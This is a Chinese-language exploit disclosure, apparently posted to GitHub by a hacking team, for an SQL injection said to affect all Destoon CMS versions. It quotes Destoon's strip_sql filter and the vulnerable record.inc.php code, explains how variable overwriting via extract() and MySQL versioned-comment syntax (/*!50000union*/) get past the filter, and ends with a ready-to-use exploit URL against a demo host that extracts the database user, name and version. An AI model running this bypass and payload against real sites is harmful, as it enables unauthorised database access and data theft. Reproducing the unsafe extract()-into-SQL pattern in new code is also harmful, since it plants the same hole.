-
Notifications
You must be signed in to change notification settings - Fork 6
/
Destoon全版本通杀注入.txt
76 lines (51 loc) · 3.05 KB
/
Destoon全版本通杀注入.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
.::Destoon最新全版本通杀SQL注入漏洞::.
We enjoy hacking of life in day and night.
_______________________________________________
[+] HSID: FF000-HSDB-0004
[+] Author: Kavia <kavia#ff0000.cc>
[+] Team: FF0000 TEAM <http://www.ff0000.cc>
[+] From: HackerSoul <http://www.hackersoul.com>
[+] Create: 2013-10-10
_______________________________________________
-= Main =-
文件:/common.inc.php 64行:
if($_POST) $_POST = strip_sql($_POST); //strip_sql()过滤
if($_GET) $_GET = strip_sql($_GET);
if($_COOKIE) $_COOKIE = strip_sql($_COOKIE);
.........
if($_POST) extract($_POST, EXTR_SKIP); //注册变量
if($_GET) extract($_GET, EXTR_SKIP);
跟进strip_sql()
文件:/include/global.func.php 186行:
function strip_sql($string) {
$search = array("/union([[:space:]\/])/i","/select([[:space:]\/])/i","/update([[:space:]\/])/i","/replace([[:space:]\/])/i","/delete([[:space:]\/])/i","/drop([[:space:]\/])/i","/outfile([[:space:]\/])/i","/dumpfile([[:space:]\/])/i","/load_file\(/i","/substring\(/i","/ascii\(/i","/hex\(/i","/ord\(/i","/char\(/i");
$replace = array('union\\1','select\\1','update\\1','replace\\1','delete\\1','drop\\1','outfile\\1','dumpfile\\1','load_file(','substring(','ascii(','hex(','ord(','char(');
return is_array($string) ? array_map('strip_sql', $string) : preg_replace($search, $replace, $string);
}
采用了新的正则表达式,之前西毒放出的exp,已经无法绕过新版本的过滤了。
此处可采用新的绕过方式:/!5000union*/
文件:/module/member/record.inc.php 16行:
isset($mid) or $mid = 0;
isset($currency) or $currency = '';
$module_select = module_select('mid', $L['module_name'], $mid);
if($keyword) $condition .= " AND title LIKE '%$keyword%'";
if($fromtime) $condition .= " AND paytime>".(strtotime($fromtime.' 00:00:00'));
if($totime) $condition .= " AND paytime<".(strtotime($totime.' 23:59:59'));
if($mid) $condition .= " AND moduleid=$mid";
if($itemid) $condition .= " AND itemid=$itemid";
if($currency) $condition .= " AND currency='$currency'";
$r = $db->get_one("SELECT COUNT(*) AS num FROM {$DT_PRE}finance_pay WHERE $condition");//
$pages = pages($r['num'], $page, $pagesize);
$lists = array();
echo "SELECT * FROM {$DT_PRE}finance_pay WHERE $condition ORDER BY pid DESC LIMIT $offset,$pagesize";
$result = $db->query("SELECT * FROM {$DT_PRE}finance_pay WHERE $condition ORDER BY pid DESC LIMIT $offset,$pagesize");
此处利用变量覆盖,就可以顺利构造sql注入
文件:/member/record.php
<?php
require 'config.inc.php';
require '../common.inc.php';
require DT_ROOT.'/module/'.$module.'/record.inc.php';
?>
引入了common.inc.php,所以存在变量覆盖。并且可以绕过正则的过滤。最终造成sql注入
EXP:
http://demo.destoon.com/v5.0/member/record.php?action=pay&mid=-1/*!50000union*//*!50000select*/user(),2,database(),version(),5,6,7,8,9--